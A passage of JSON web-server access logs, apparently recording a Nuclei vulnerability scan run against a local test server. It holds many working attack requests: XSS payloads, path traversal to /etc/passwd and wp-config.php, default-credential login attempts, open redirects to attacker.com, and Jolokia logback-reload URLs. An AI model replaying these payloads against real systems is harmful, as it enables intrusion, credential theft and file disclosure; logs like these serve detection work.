/127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"29KAniS8iWQInJ0NpDMeHuFhZaW.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/29KAniS8iWQInJ0NpDMeHuFhZaW.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/29KAnlGj2YjLHbpXDcm8El6MNao/)%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hm/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 